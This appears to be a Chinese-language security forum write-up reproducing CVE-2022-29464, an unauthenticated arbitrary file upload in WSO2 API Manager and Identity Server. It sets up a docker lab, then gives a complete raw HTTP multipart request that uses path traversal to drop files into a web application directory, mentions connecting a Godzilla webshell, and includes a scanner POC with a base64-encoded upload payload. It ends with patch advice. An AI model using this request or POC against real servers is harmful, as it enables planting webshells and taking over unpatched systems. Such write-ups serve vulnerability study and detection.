0x01漏洞描述
WSO2文件上传漏洞是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传。
0x02影响范围
WSO2 API Manager 2.2.0 及更高版本到 4.0.0
WSO2 Identity Server 5.2.0 及以上至 5.11.0
WSO2 Identity Server Analytics(身份服务器分析) 5.4.0、5.4.1、5.5.0 和 5.6.0
WSO2 Identity Server as Key Manager(身份服务器作为密钥管理器) 5.3.0 及更高版本至 5.10.0
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0
0x03环境搭建
使用docker进行环境搭建
docker pull vulfocus/wso2-cve_2022_29464
docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464
直接打开https://ip:9443 如下显示则环境搭建成功。
0x04漏洞复现
1、抓包
打开页面抓取随意数据包
然后修改上传包
POST /fileupload/toolsAny HTTP/1.1
Host: xxxx:xxxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 889
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.txt"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.txt"
123123
--4ef9f369a86bfaadf5ec3177278d49c0--2、测试
发送数据包且返回包响应为200,内容中含有1.6······等一串数字,
则证明上传成功。
然后访问
https://ip:9443/authenticationendpoint/”wenjianming”
成功上传
3、shell
使用哥斯拉马进行测试下
成功连接
0x05 POC检测
poc:
params: []
name: WSO2文件上传漏洞
set:
ri: randomInt(800000000, 1000000000)
r1: base64Decode('LS00YWY2ZjM2MmE4NmJhYWRmNWVjMzE3NzI3OGQ0OTExDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii4uLy4uLy4uLy4uL3JlcG9zaXRvcnkvZGVwbG95bWVudC9zZXJ2ZXIvd2ViYXBwcy9hdXRoZW50aWNhdGlvbmVuZHBvaW50LzgwODI0MDQ1Ni50eHQiOyBmaWxlbmFtZT0iLi4vLi4vLi4vLi4vcmVwb3NpdG9yeS9kZXBsb3ltZW50L3NlcnZlci93ZWJhcHBzL2F1dGhlbnRpY2F0aW9uZW5kcG9pbnQvODA4MjQwNDU2LnR4dCINCg0KMTMyMzMxMjMNCg0KLS00YWY2ZjM2MmE4NmJhYWRmNWVjMzE3NzI3OGQ0OTExLS0=')
rules:
- method: POST
path: /fileupload/toolsAny
headers:
Content-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911
body: |
{{r1}}
search: ""
followredirects: false
expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=")
- method: GET
path: /authenticationendpoint/808240456.txt
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes("13233123"))
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
0x06 修复方案
厂商已分别发布补丁修复漏洞,用户请尽快更新至安全版本。
请登录后查看回复内容